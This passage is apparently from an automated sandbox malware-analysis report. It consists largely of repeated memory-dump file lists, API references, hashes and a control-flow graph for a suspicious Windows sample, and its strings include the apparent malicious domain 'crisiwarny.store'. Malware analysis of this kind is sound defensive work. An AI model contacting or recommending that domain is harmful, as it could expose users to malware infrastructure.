                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      • Opcode ID: ba261ad64a65ccf3c4d1d6a90a2964cfe7c7f0ba9fb40eb1ec4c39be5d9a9873
                                                                                                      • Instruction ID: 06d1c0fad5fc94993fb2873c76803ba0d25a35f93415cca205632e2a303406bb
                                                                                                      • Opcode Fuzzy Hash: ba261ad64a65ccf3c4d1d6a90a2964cfe7c7f0ba9fb40eb1ec4c39be5d9a9873
                                                                                                      • Instruction Fuzzy Hash: 5A116B77E452508FD3108F68DCA1797BB6AFBC6711F2A453DDC809B690CA385806CBD1
                                                                                                      APIs
                                                                                                      • LdrInitializeThunk.NTDLL(008B4852,005C003F,00000002,00000018,?), ref: 008B0F3E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                      • Opcode ID: b2dec5dd3f901841fb05172efd4bf4ac5086a5494decfa27e6a7de0dd47b150a
                                                                                                      • Instruction ID: 11839ac0482d97ecd58b2929de563868a6efbf83fa72dca5c9d165986ee82c70
                                                                                                      • Opcode Fuzzy Hash: b2dec5dd3f901841fb05172efd4bf4ac5086a5494decfa27e6a7de0dd47b150a
                                                                                                      • Instruction Fuzzy Hash: DA3105715083049BD318DF68D8D26AFBBF5FBD5314F18992CE69587381D3349848CB52
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 63b946340cae88d4391a4fff09ff913fb8b69a828dd9cef6d79aa9a04c49276d
                                                                                                      • Instruction ID: 4a7da5f6c367178fb7ed829439139588291f6c0fd83f4353aa126f0d00ad37ea
                                                                                                      • Opcode Fuzzy Hash: 63b946340cae88d4391a4fff09ff913fb8b69a828dd9cef6d79aa9a04c49276d
                                                                                                      • Instruction Fuzzy Hash: 5BD15B727483444BDF18AE2888816AB77E2FF95318F1C852CE895CB396E634DD0697C3

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 173 880ca0-880cbb CoInitializeSecurity 174 880ddd 173->174 175 880cc2-880ccd call 8abb70 173->175 177 880de3 174->177 178 880cd2-880ce6 175->178 179 880de6-880def 177->179 180 880cf0-880d0e 178->180 181 880e0b-880e13 179->181 182 880df1-880df4 179->182 180->180 183 880d10-880d5f 180->183 185 880e2d 181->185 186 880e15-880e19 181->186 184 880e00-880e09 182->184 187 880d60-880d8e 183->187 184->181 184->184 190 880e30-880ee6 185->190 188 880e20-880e29 186->188 187->187 189 880d90-880d9c 187->189 188->188 191 880e2b 188->191 192 880dbb-880dc3 189->192 193 880d9e-880da1 189->193 194 880ef0-880f23 190->194 191->190 192->177 196 880dc5-880dc9 192->196 195 880db0-880db9 193->195 194->194 197 880f25-880f4b 194->197 195->192 195->195 198 880dd0-880dd9 196->198 199 880f50-880f89 197->199 198->198 200 880ddb 198->200 199->199 201 880f8b-880fa9 call 87fa80 199->201 200->179 203 880fae-880fb4 201->203 204 880fbb-880fc8 203->204 205 88103d-881046 call 873dc0 203->205 206 880fcf-880ff7 203->206 204->204 204->206 210 880ff9-880ffc 206->210 211 880ffe 206->211 210->211 212 880fff-881007 210->212 211->212 213 881009-88100c 212->213 214 88100e 212->214 213->214 215 88100f-881036 call 87c880 call 8ac620 call 8ae210 213->215 214->215 215->204 215->205 215->206
                                                                                                      APIs
                                                                                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00880CB2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1723214505.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1723197918.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723250589.00000000008CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723269562.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723285160.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723300029.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723397634.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723415099.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723433409.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723467872.0000000000A59000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723483859.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723500035.0000000000A65000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723517338.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723809098.0000000000A8A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723828156.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723845372.0000000000A8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723864274.0000000000A98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723885621.0000000000AAD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723904125.0000000000AB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723922482.0000000000ABA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723940253.0000000000ABF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723957672.0000000000AC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723973850.0000000000AC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1723990319.0000000000ACF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724009256.0000000000AD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724027928.0000000000AD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724045083.0000000000AE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724064498.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724081220.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724102450.0000000000B01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724121123.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724168291.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724186447.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724205232.0000000000B47000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724223718.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724245108.0000000000B5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724265045.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724283723.0000000000B64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724322483.0000000000B72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1724341878.0000000000B73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InitializeSecurity
                                                                                                      • String ID: 61471D60A75CBA4AD36A30054881336C$Mz$crisiwarny.store$tO
                                                                                                      • API String ID: 640775948-1309824500
                                                                                                      • Opcode ID: edbdbb37440af08fdf943804514870eb9514a8359b47b29373624b61682366b1
                                                                                                      • Instruction ID: 956a17b2b4a5700314aee977a340447bc6ed8b67d31bbef44f42050e15468dd9
